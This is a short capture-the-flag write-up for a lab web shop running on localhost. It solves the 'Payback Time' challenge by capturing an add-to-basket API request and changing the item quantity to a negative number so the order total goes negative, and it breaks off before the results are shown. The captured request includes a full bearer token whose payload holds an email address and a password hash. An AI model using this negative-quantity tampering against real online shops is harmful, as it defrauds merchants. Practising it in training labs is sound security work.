Payback Time

Difficulty: 🌟🌟🌟

Description: Place an order that makes you rich.

Category: Improper Input Validation

Tags:

Solution:

I inspected the request after adding items to the basket:

Add item request

POST /api/BasketItems/ HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en,en-US;q=0.9
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJ0aWVudmluaC5kdW9uZzRAZ21haWwuY29tIiwicGFzc3dvcmQiOiI4MjdjY2IwZWVhOGE3MDZjNGMzNGExNjg5MWY4NGU3YiIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIwLjAuMC4wIiwicHJvZmlsZUltYWdlIjoiL2Fzc2V0cy9wdWJsaWMvaW1hZ2VzL3VwbG9hZHMvZGVmYXVsdC5zdmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjItMDctMjEgMTM6NTI6MzkuNDYxICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjItMDctMjEgMTM6NTI6MzkuNDYxICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTY1ODQxMTU2OSwiZXhwIjoxNjU4NDI5NTY5fQ.sjcN_BJX47dDpi4h_j55YnFv5c8Pa4ViQ7F9d6fcFAdzCSwvmKjMrkNKyM8pAEN8O7fA5xYIAWOKDGWiDlglC3Y0g5vlWlCj1vhpcGF2uB7x6uhBFdNv8lBddAchk4BMkk6HyyxKz38iAw8q6BGavC9oCsEqpIBLoSOgEaSsJBA
Connection: keep-alive
Content-Length: 44
Content-Type: application/json
Cookie: language=en
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Referer: http://localhost:3000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
sec-ch-ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"

{
  "ProductId": 24,
  "BasketId": "6",
  "quantity": 1
}

So I tried to change quantity to -1111 so the money we pay would be negative, and the request was processed successfully ❗:

Let's check the basket:

Then check out the order:

Result: